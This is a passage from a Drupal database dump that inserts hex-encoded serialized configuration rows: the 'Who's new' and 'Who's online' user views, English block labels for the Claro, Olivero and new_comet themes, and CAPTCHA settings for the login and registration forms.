('', 'views.view.who_s_new', 0x613a31333a7b733a343a2275756964223b733a33363a2237313734323834612d356538362d346332372d383365622d356433663361356165633364223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227a6a69305f31334d7956474b37426e316c554d44655a79794f495a6564577671705955654d5f53696f5049223b7d733a323a226964223b733a393a2277686f5f735f6e6577223b733a353a226c6162656c223b733a393a2257686f2773206e6577223b733a363a226d6f64756c65223b733a343a2275736572223b733a31313a226465736372697074696f6e223b733a35333a2253686f77732061206c697374206f6620746865206e65776573742075736572206163636f756e7473206f6e2074686520736974652e223b733a333a22746167223b733a373a2264656661756c74223b733a31303a22626173655f7461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a31303a22626173655f6669656c64223b733a333a22756964223b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a363a7b733a323a226964223b733a373a2264656661756c74223b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b733a31343a22646973706c61795f706c7567696e223b733a373a2264656661756c74223b733a383a22706f736974696f6e223b693a303b733a31353a22646973706c61795f6f7074696f6e73223b613a31373a7b733a353a227469746c65223b733a393a2257686f2773206e6577223b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a32353a7b733a323a226964223b733a343a226e616d65223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a343a226e616d65223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a343a226e616d65223b733a393a22706c7567696e5f6964223b733a353a226669656c64223b733a353a226c6162656c223b733a303a22223b733a373a226578636c756465223b623a303b733a353a22616c746572223b613a383a7b733a31303a22616c7465725f74657874223b623a303b733a393a226d616b655f6c696e6b223b623a303b733a383a226162736f6c757465223b623a303b733a31333a22776f72645f626f756e64617279223b623a303b733a383a22656c6c6970736973223b623a303b733a31303a2273747269705f74616773223b623a303b733a343a227472696d223b623a303b733a343a2268746d6c223b623a303b7d733a31323a22656c656d656e745f74797065223b733a303a22223b733a31333a22656c656d656e745f636c617373223b733a303a22223b733a31383a22656c656d656e745f6c6162656c5f74797065223b733a303a22223b733a31393a22656c656d656e745f6c6162656c5f636c617373223b733a303a22223b733a31393a22656c656d656e745f6c6162656c5f636f6c6f6e223b623a313b733a32303a22656c656d656e745f777261707065725f74797065223b733a303a22223b733a32313a22656c656d656e745f777261707065725f636c617373223b733a303a22223b733a32333a22656c656d656e745f64656661756c745f636c6173736573223b623a313b733a353a22656d707479223b733a303a22223b733a31303a22686964655f656d707479223b623a303b733a31303a22656d7074795f7a65726f223b623a303b733a31363a22686964655f616c7465725f656d707479223b623a313b733a343a2274797065223b733a393a22757365725f6e616d65223b7d7d733a353a227061676572223b613a323a7b733a343a2274797065223b733a343a22736f6d65223b733a373a226f7074696f6e73223b613a323a7b733a363a226f6666736574223b693a303b733a31343a226974656d735f7065725f70616765223b693a353b7d7d733a31323a226578706f7365645f666f726d223b613a323a7b733a343a2274797065223b733a353a226261736963223b733a373a226f7074696f6e73223b613a373a7b733a31333a227375626d69745f627574746f6e223b733a353a224170706c79223b733a31323a2272657365745f627574746f6e223b623a303b733a31383a2272657365745f627574746f6e5f6c6162656c223b733a353a225265736574223b733a31393a226578706f7365645f736f7274735f6c6162656c223b733a373a22536f7274206279223b733a31373a226578706f73655f736f72745f6f72646572223b623a313b733a31343a22736f72745f6173635f6c6162656c223b733a333a22417363223b733a31353a22736f72745f646573635f6c6162656c223b733a343a2244657363223b7d7d733a363a22616363657373223b613a323a7b733a343a2274797065223b733a343a227065726d223b733a373a226f7074696f6e73223b613a313a7b733a343a227065726d223b733a31343a2261636365737320636f6e74656e74223b7d7d733a353a226361636865223b613a323a7b733a343a2274797065223b733a333a22746167223b733a373a226f7074696f6e73223b613a303a7b7d7d733a353a22656d707479223b613a303a7b7d733a353a22736f727473223b613a313a7b733a373a2263726561746564223b613a31333a7b733a323a226964223b733a373a2263726561746564223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a373a2263726561746564223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a373a2263726561746564223b733a393a22706c7567696e5f6964223b733a343a2264617465223b733a353a226f72646572223b733a343a2244455343223b733a363a226578706f7365223b613a323a7b733a353a226c6162656c223b733a303a22223b733a31363a226669656c645f6964656e746966696572223b733a373a2263726561746564223b7d733a373a226578706f736564223b623a303b733a31313a226772616e756c6172697479223b733a363a227365636f6e64223b7d7d733a393a22617267756d656e7473223b613a303a7b7d733a373a2266696c74657273223b613a323a7b733a363a22737461747573223b613a393a7b733a323a226964223b733a363a22737461747573223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a363a22737461747573223b733a393a22706c7567696e5f6964223b733a373a22626f6f6c65616e223b733a353a2276616c7565223b733a313a2231223b733a353a2267726f7570223b693a313b733a363a226578706f7365223b613a333a7b733a383a226f70657261746f72223b733a313a2230223b733a32343a226f70657261746f725f6c696d69745f73656c656374696f6e223b623a303b733a31333a226f70657261746f725f6c697374223b613a303a7b7d7d7d733a363a22616363657373223b613a31363a7b733a323a226964223b733a363a22616363657373223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a363a22616363657373223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a363a22616363657373223b733a393a22706c7567696e5f6964223b733a343a2264617465223b733a383a226f70657261746f72223b733a313a223e223b733a353a2276616c7565223b613a343a7b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a353a2276616c7565223b733a31303a22313937302d30312d3031223b733a343a2274797065223b733a343a2264617465223b7d733a353a2267726f7570223b693a313b733a373a226578706f736564223b623a303b733a363a226578706f7365223b613a31323a7b733a31313a226f70657261746f725f6964223b733a313a2230223b733a353a226c6162656c223b733a303a22223b733a31313a226465736372697074696f6e223b733a303a22223b733a31323a227573655f6f70657261746f72223b623a303b733a383a226f70657261746f72223b733a303a22223b733a32343a226f70657261746f725f6c696d69745f73656c656374696f6e223b623a303b733a31333a226f70657261746f725f6c697374223b613a303a7b7d733a31303a226964656e746966696572223b733a303a22223b733a383a227265717569726564223b623a303b733a383a2272656d656d626572223b623a303b733a383a226d756c7469706c65223b623a303b733a31343a2272656d656d6265725f726f6c6573223b613a313a7b733a31333a2261757468656e74696361746564223b733a31333a2261757468656e74696361746564223b7d7d733a31303a2269735f67726f75706564223b623a303b733a31303a2267726f75705f696e666f223b613a31303a7b733a353a226c6162656c223b733a303a22223b733a31313a226465736372697074696f6e223b733a303a22223b733a31303a226964656e746966696572223b733a303a22223b733a383a226f7074696f6e616c223b623a313b733a363a22776964676574223b733a363a2273656c656374223b733a383a226d756c7469706c65223b623a303b733a383a2272656d656d626572223b623a303b733a31333a2264656661756c745f67726f7570223b733a333a22416c6c223b733a32323a2264656661756c745f67726f75705f6d756c7469706c65223b613a303a7b7d733a31313a2267726f75705f6974656d73223b613a303a7b7d7d7d7d733a353a227374796c65223b613a313a7b733a343a2274797065223b733a393a2268746d6c5f6c697374223b7d733a333a22726f77223b613a313a7b733a343a2274797065223b733a363a226669656c6473223b7d733a353a227175657279223b613a323a7b733a343a2274797065223b733a31313a2276696577735f7175657279223b733a373a226f7074696f6e73223b613a353a7b733a31333a2271756572795f636f6d6d656e74223b733a303a22223b733a31393a2264697361626c655f73716c5f72657772697465223b623a303b733a383a2264697374696e6374223b623a303b733a373a227265706c696361223b623a303b733a31303a2271756572795f74616773223b613a303a7b7d7d7d733a31333a2272656c6174696f6e7368697073223b613a303a7b7d733a363a22686561646572223b613a303a7b7d733a363a22666f6f746572223b613a303a7b7d733a31373a22646973706c61795f657874656e64657273223b613a303a7b7d7d733a31343a2263616368655f6d65746164617461223b613a333a7b733a373a226d61782d616765223b693a2d313b733a383a22636f6e7465787473223b613a333a7b693a303b733a32363a226c616e6775616765733a6c616e67756167655f636f6e74656e74223b693a313b733a32383a226c616e6775616765733a6c616e67756167655f696e74657266616365223b693a323b733a31363a22757365722e7065726d697373696f6e73223b7d733a343a2274616773223b613a303a7b7d7d7d733a373a22626c6f636b5f31223b613a363a7b733a323a226964223b733a373a22626c6f636b5f31223b733a31333a22646973706c61795f7469746c65223b733a393a2257686f2773206e6577223b733a31343a22646973706c61795f706c7567696e223b733a353a22626c6f636b223b733a383a22706f736974696f6e223b693a313b733a31353a22646973706c61795f6f7074696f6e73223b613a343a7b733a31393a22646973706c61795f6465736372697074696f6e223b733a31393a2241206c697374206f66206e6577207573657273223b733a31373a22646973706c61795f657874656e64657273223b613a303a7b7d733a31373a22626c6f636b5f6465736372697074696f6e223b733a393a2257686f2773206e6577223b733a31343a22626c6f636b5f63617465676f7279223b733a343a2255736572223b7d733a31343a2263616368655f6d65746164617461223b613a333a7b733a373a226d61782d616765223b693a2d313b733a383a22636f6e7465787473223b613a333a7b693a303b733a32363a226c616e6775616765733a6c616e67756167655f636f6e74656e74223b693a313b733a32383a226c616e6775616765733a6c616e67756167655f696e74657266616365223b693a323b733a31363a22757365722e7065726d697373696f6e73223b7d733a343a2274616773223b613a303a7b7d7d7d7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'views.view.who_s_online', 0x613a31333a7b733a343a2275756964223b733a33363a2265613966303961392d636630662d343738342d383334662d363839336563336536636535223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2273754473564d676177586f51743472666d646670723035455658337a334b7966444454596765534d383938223b7d733a323a226964223b733a31323a2277686f5f735f6f6e6c696e65223b733a353a226c6162656c223b733a31383a2257686f2773206f6e6c696e6520626c6f636b223b733a363a226d6f64756c65223b733a343a2275736572223b733a31313a226465736372697074696f6e223b733a39333a2253686f7773207468652075736572206e616d6573206f6620746865206d6f737420726563656e746c79206163746976652075736572732c20616e642074686520746f74616c206e756d626572206f66206163746976652075736572732e223b733a333a22746167223b733a373a2264656661756c74223b733a31303a22626173655f7461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a31303a22626173655f6669656c64223b733a333a22756964223b733a373a22646973706c6179223b613a323a7b733a373a2264656661756c74223b613a363a7b733a323a226964223b733a373a2264656661756c74223b733a31333a22646973706c61795f7469746c65223b733a31353a22e38387e38395e382a9e383abe38388223b733a31343a22646973706c61795f706c7567696e223b733a373a2264656661756c74223b733a383a22706f736974696f6e223b693a303b733a31353a22646973706c61795f6f7074696f6e73223b613a31373a7b733a353a227469746c65223b733a31323a2257686f2773206f6e6c696e65223b733a363a226669656c6473223b613a313a7b733a343a226e616d65223b613a32353a7b733a323a226964223b733a343a226e616d65223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a343a226e616d65223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a343a226e616d65223b733a393a22706c7567696e5f6964223b733a353a226669656c64223b733a353a226c6162656c223b733a303a22223b733a373a226578636c756465223b623a303b733a353a22616c746572223b613a383a7b733a31303a22616c7465725f74657874223b623a303b733a393a226d616b655f6c696e6b223b623a303b733a383a226162736f6c757465223b623a303b733a31333a22776f72645f626f756e64617279223b623a303b733a383a22656c6c6970736973223b623a303b733a31303a2273747269705f74616773223b623a303b733a343a227472696d223b623a303b733a343a2268746d6c223b623a303b7d733a31323a22656c656d656e745f74797065223b733a303a22223b733a31333a22656c656d656e745f636c617373223b733a303a22223b733a31383a22656c656d656e745f6c6162656c5f74797065223b733a303a22223b733a31393a22656c656d656e745f6c6162656c5f636c617373223b733a303a22223b733a31393a22656c656d656e745f6c6162656c5f636f6c6f6e223b623a313b733a32303a22656c656d656e745f777261707065725f74797065223b733a303a22223b733a32313a22656c656d656e745f777261707065725f636c617373223b733a303a22223b733a32333a22656c656d656e745f64656661756c745f636c6173736573223b623a313b733a353a22656d707479223b733a303a22223b733a31303a22686964655f656d707479223b623a303b733a31303a22656d7074795f7a65726f223b623a303b733a31363a22686964655f616c7465725f656d707479223b623a313b733a343a2274797065223b733a393a22757365725f6e616d65223b7d7d733a353a227061676572223b613a323a7b733a343a2274797065223b733a343a22736f6d65223b733a373a226f7074696f6e73223b613a323a7b733a363a226f6666736574223b693a303b733a31343a226974656d735f7065725f70616765223b693a31303b7d7d733a31323a226578706f7365645f666f726d223b613a323a7b733a343a2274797065223b733a353a226261736963223b733a373a226f7074696f6e73223b613a373a7b733a31333a227375626d69745f627574746f6e223b733a353a224170706c79223b733a31323a2272657365745f627574746f6e223b623a303b733a31383a2272657365745f627574746f6e5f6c6162656c223b733a353a225265736574223b733a31393a226578706f7365645f736f7274735f6c6162656c223b733a373a22536f7274206279223b733a31373a226578706f73655f736f72745f6f72646572223b623a313b733a31343a22736f72745f6173635f6c6162656c223b733a333a22417363223b733a31353a22736f72745f646573635f6c6162656c223b733a343a2244657363223b7d7d733a363a22616363657373223b613a323a7b733a343a2274797065223b733a343a227065726d223b733a373a226f7074696f6e73223b613a313a7b733a343a227065726d223b733a32303a2261636365737320757365722070726f66696c6573223b7d7d733a353a226361636865223b613a323a7b733a343a2274797065223b733a333a22746167223b733a373a226f7074696f6e73223b613a303a7b7d7d733a353a22656d707479223b613a313a7b733a31363a22617265615f746578745f637573746f6d223b613a31303a7b733a323a226964223b733a31363a22617265615f746578745f637573746f6d223b733a353a227461626c65223b733a353a227669657773223b733a353a226669656c64223b733a31363a22617265615f746578745f637573746f6d223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a393a22706c7567696e5f6964223b733a31313a22746578745f637573746f6d223b733a353a22656d707479223b623a313b733a373a22636f6e74656e74223b733a33353a225468657265206172652063757272656e746c792030207573657273206f6e6c696e652e223b733a383a22746f6b656e697a65223b623a303b7d7d733a353a22736f727473223b613a313a7b733a363a22616363657373223b613a31333a7b733a323a226964223b733a363a22616363657373223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a363a22616363657373223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a363a22616363657373223b733a393a22706c7567696e5f6964223b733a343a2264617465223b733a353a226f72646572223b733a343a2244455343223b733a363a226578706f7365223b613a323a7b733a353a226c6162656c223b733a303a22223b733a31363a226669656c645f6964656e746966696572223b733a363a22616363657373223b7d733a373a226578706f736564223b623a303b733a31313a226772616e756c6172697479223b733a363a227365636f6e64223b7d7d733a393a22617267756d656e7473223b613a303a7b7d733a373a2266696c74657273223b613a323a7b733a363a22737461747573223b613a393a7b733a323a226964223b733a363a22737461747573223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a363a22737461747573223b733a393a22706c7567696e5f6964223b733a373a22626f6f6c65616e223b733a353a2276616c7565223b733a313a2231223b733a353a2267726f7570223b693a313b733a363a226578706f7365223b613a333a7b733a383a226f70657261746f72223b733a313a2230223b733a32343a226f70657261746f725f6c696d69745f73656c656374696f6e223b623a303b733a31333a226f70657261746f725f6c697374223b613a303a7b7d7d7d733a363a22616363657373223b613a31363a7b733a323a226964223b733a363a22616363657373223b733a353a227461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a353a226669656c64223b733a363a22616363657373223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a31323a22656e746974795f6669656c64223b733a363a22616363657373223b733a393a22706c7567696e5f6964223b733a343a2264617465223b733a383a226f70657261746f72223b733a323a223e3d223b733a353a2276616c7565223b613a343a7b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a353a2276616c7565223b733a31313a222d3135206d696e75746573223b733a343a2274797065223b733a363a226f6666736574223b7d733a353a2267726f7570223b693a313b733a373a226578706f736564223b623a303b733a363a226578706f7365223b613a31323a7b733a31313a226f70657261746f725f6964223b733a393a226163636573735f6f70223b733a353a226c6162656c223b733a31313a224c61737420616363657373223b733a31313a226465736372697074696f6e223b733a37373a2241207573657220697320636f6e73696465726564206f6e6c696e6520666f722074686973206c6f6e6720616674657220746865792068617665206c61737420766965776564206120706167652e223b733a31323a227573655f6f70657261746f72223b623a303b733a383a226f70657261746f72223b733a393a226163636573735f6f70223b733a32343a226f70657261746f725f6c696d69745f73656c656374696f6e223b623a303b733a31333a226f70657261746f725f6c697374223b613a303a7b7d733a31303a226964656e746966696572223b733a363a22616363657373223b733a383a227265717569726564223b623a303b733a383a2272656d656d626572223b623a303b733a383a226d756c7469706c65223b623a303b733a31343a2272656d656d6265725f726f6c6573223b613a333a7b733a31333a2261757468656e74696361746564223b733a31333a2261757468656e74696361746564223b733a393a22616e6f6e796d6f7573223b733a313a2230223b733a31333a2261646d696e6973747261746f72223b733a313a2230223b7d7d733a31303a2269735f67726f75706564223b623a303b733a31303a2267726f75705f696e666f223b613a31303a7b733a353a226c6162656c223b733a303a22223b733a31313a226465736372697074696f6e223b733a303a22223b733a31303a226964656e746966696572223b733a303a22223b733a383a226f7074696f6e616c223b623a313b733a363a22776964676574223b733a363a2273656c656374223b733a383a226d756c7469706c65223b623a303b733a383a2272656d656d626572223b623a303b733a31333a2264656661756c745f67726f7570223b733a333a22416c6c223b733a32323a2264656661756c745f67726f75705f6d756c7469706c65223b613a303a7b7d733a31313a2267726f75705f6974656d73223b613a303a7b7d7d7d7d733a353a227374796c65223b613a323a7b733a343a2274797065223b733a393a2268746d6c5f6c697374223b733a373a226f7074696f6e73223b613a363a7b733a383a2267726f7570696e67223b613a303a7b7d733a393a22726f775f636c617373223b733a303a22223b733a31373a2264656661756c745f726f775f636c617373223b623a313b733a343a2274797065223b733a323a22756c223b733a31333a22777261707065725f636c617373223b733a393a226974656d2d6c697374223b733a353a22636c617373223b733a303a22223b7d7d733a333a22726f77223b613a313a7b733a343a2274797065223b733a363a226669656c6473223b7d733a353a227175657279223b613a323a7b733a343a2274797065223b733a31313a2276696577735f7175657279223b733a373a226f7074696f6e73223b613a353a7b733a31333a2271756572795f636f6d6d656e74223b733a303a22223b733a31393a2264697361626c655f73716c5f72657772697465223b623a303b733a383a2264697374696e6374223b623a303b733a373a227265706c696361223b623a303b733a31303a2271756572795f74616773223b613a303a7b7d7d7d733a31333a2272656c6174696f6e7368697073223b613a303a7b7d733a363a22686561646572223b613a313a7b733a363a22726573756c74223b613a393a7b733a323a226964223b733a363a22726573756c74223b733a353a227461626c65223b733a353a227669657773223b733a353a226669656c64223b733a363a22726573756c74223b733a31323a2272656c6174696f6e73686970223b733a343a226e6f6e65223b733a31303a2267726f75705f74797065223b733a353a2267726f7570223b733a31313a2261646d696e5f6c6162656c223b733a303a22223b733a393a22706c7567696e5f6964223b733a363a22726573756c74223b733a353a22656d707479223b623a303b733a373a22636f6e74656e74223b733a34303a225468657265206172652063757272656e746c792040746f74616c207573657273206f6e6c696e652e223b7d7d733a363a22666f6f746572223b613a303a7b7d733a31373a22646973706c61795f657874656e64657273223b613a303a7b7d7d733a31343a2263616368655f6d65746164617461223b613a333a7b733a373a226d61782d616765223b693a2d313b733a383a22636f6e7465787473223b613a333a7b693a303b733a32363a226c616e6775616765733a6c616e67756167655f636f6e74656e74223b693a313b733a32383a226c616e6775616765733a6c616e67756167655f696e74657266616365223b693a323b733a31363a22757365722e7065726d697373696f6e73223b7d733a343a2274616773223b613a303a7b7d7d7d733a31383a2277686f5f735f6f6e6c696e655f626c6f636b223b613a363a7b733a323a226964223b733a31383a2277686f5f735f6f6e6c696e655f626c6f636b223b733a31333a22646973706c61795f7469746c65223b733a31323a2257686f2773206f6e6c696e65223b733a31343a22646973706c61795f706c7567696e223b733a353a22626c6f636b223b733a383a22706f736974696f6e223b693a313b733a31353a22646973706c61795f6f7074696f6e73223b613a333a7b733a31393a22646973706c61795f6465736372697074696f6e223b733a34353a2241206c697374206f662075736572732074686174206172652063757272656e746c79206c6f6767656420696e2e223b733a31373a22646973706c61795f657874656e64657273223b613a303a7b7d733a31373a22626c6f636b5f6465736372697074696f6e223b733a31323a2257686f2773206f6e6c696e65223b7d733a31343a2263616368655f6d65746164617461223b613a333a7b733a373a226d61782d616765223b693a2d313b733a383a22636f6e7465787473223b613a333a7b693a303b733a32363a226c616e6775616765733a6c616e67756167655f636f6e74656e74223b693a313b733a32383a226c616e6775616765733a6c616e67756167655f696e74657266616365223b693a323b733a31363a22757365722e7065726d697373696f6e73223b7d733a343a2274616773223b613a303a7b7d7d7d7d7d),
('language.en', 'block.block.claro_breadcrumbs', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31313a2242726561646372756d6273223b7d7d),
('language.en', 'block.block.claro_content', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31373a224d61696e207061676520636f6e74656e74223b7d7d),
('language.en', 'block.block.claro_help', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a343a2248656c70223b7d7d),
('language.en', 'block.block.claro_local_actions', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32313a225072696d6172792061646d696e20616374696f6e73223b7d7d),
('language.en', 'block.block.claro_messages', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31353a22537461747573206d65737361676573223b7d7d),
('language.en', 'block.block.claro_page_title', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31303a2250616765207469746c65223b7d7d),
('language.en', 'block.block.claro_primary_local_tasks', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31323a225072696d6172792074616273223b7d7d),
('language.en', 'block.block.claro_secondary_local_tasks', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31343a225365636f6e646172792074616273223b7d7d),
('language.en', 'block.block.new_comet_account_menu', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a393a2255736572206d656e75223b7d7d),
('language.en', 'block.block.new_comet_branding', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31333a2253697465206272616e64696e67223b7d7d),
('language.en', 'block.block.new_comet_breadcrumbs', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31313a2242726561646372756d6273223b7d7d),
('language.en', 'block.block.new_comet_content', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31373a224d61696e207061676520636f6e74656e74223b7d7d),
('language.en', 'block.block.new_comet_footer', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31313a22466f6f746572206d656e75223b7d7d),
('language.en', 'block.block.new_comet_help', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a343a2248656c70223b7d7d),
('language.en', 'block.block.new_comet_local_actions', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32313a225072696d6172792061646d696e20616374696f6e73223b7d7d),
('language.en', 'block.block.new_comet_local_tasks', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a343a2254616273223b7d7d),
('language.en', 'block.block.new_comet_login', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31303a2255736572206c6f67696e223b7d7d),
('language.en', 'block.block.new_comet_main_menu', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a393a224d61696e206d656e75223b7d7d),
('language.en', 'block.block.new_comet_messages', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31353a22537461747573206d65737361676573223b7d7d),
('language.en', 'block.block.new_comet_page_title', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31303a2250616765207469746c65223b7d7d),
('language.en', 'block.block.new_comet_search', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a363a22536561726368223b7d7d),
('language.en', 'block.block.new_comet_tools', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a353a22546f6f6c73223b7d7d),
('language.en', 'block.block.olivero_account_menu', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31373a2255736572206163636f756e74206d656e75223b7d7d),
('language.en', 'block.block.olivero_breadcrumbs', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31313a2242726561646372756d6273223b7d7d),
('language.en', 'block.block.olivero_content', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31373a224d61696e207061676520636f6e74656e74223b7d7d),
('language.en', 'block.block.olivero_help', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a343a2248656c70223b7d7d),
('language.en', 'block.block.olivero_main_menu', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31353a224d61696e206e617669676174696f6e223b7d7d),
('language.en', 'block.block.olivero_messages', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31353a22537461747573206d65737361676573223b7d7d),
('language.en', 'block.block.olivero_page_title', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31303a2250616765207469746c65223b7d7d),
('language.en', 'block.block.olivero_powered', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31373a22506f77657265642062792044727570616c223b7d7d),
('language.en', 'block.block.olivero_primary_admin_actions', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32313a225072696d6172792061646d696e20616374696f6e73223b7d7d),
('language.en', 'block.block.olivero_primary_local_tasks', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31323a225072696d6172792074616273223b7d7d),
('language.en', 'block.block.olivero_search_form_narrow', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a32303a2253656172636820666f726d20286e6172726f7729223b7d7d),
('language.en', 'block.block.olivero_search_form_wide', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31383a2253656172636820666f726d20287769646529223b7d7d),
('language.en', 'block.block.olivero_secondary_local_tasks', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31343a225365636f6e646172792074616273223b7d7d),
('language.en', 'block.block.olivero_site_branding', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a31333a2253697465206272616e64696e67223b7d7d),
('language.en', 'block.block.olivero_syndicate', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a353a226c6162656c223b733a383a225253532066656564223b7d7d),
('language.en', 'block_content.type.basic', 0x613a323a7b733a353a226c6162656c223b733a31313a22426173696320626c6f636b223b733a31313a226465736372697074696f6e223b733a34323a224120626173696320626c6f636b20636f6e7461696e732061207469746c6520616e64206120626f64792e223b7d),
('language.en', 'captcha.captcha_point.contact_message_personal_form', 0x613a313a7b733a353a226c6162656c223b733a32393a22636f6e746163745f6d6573736167655f706572736f6e616c5f666f726d223b7d),
('language.en', 'captcha.captcha_point.user_login_form', 0x613a313a7b733a353a226c6162656c223b733a31353a22757365725f6c6f67696e5f666f726d223b7d),
('language.en', 'captcha.captcha_point.user_pass', 0x613a313a7b733a353a226c6162656c223b733a393a22757365725f70617373223b7d),
('language.en', 'captcha.captcha_point.user_register_form', 0x613a313a7b733a353a226c6162656c223b733a31383a22757365725f72656769737465725f666f726d223b7d),
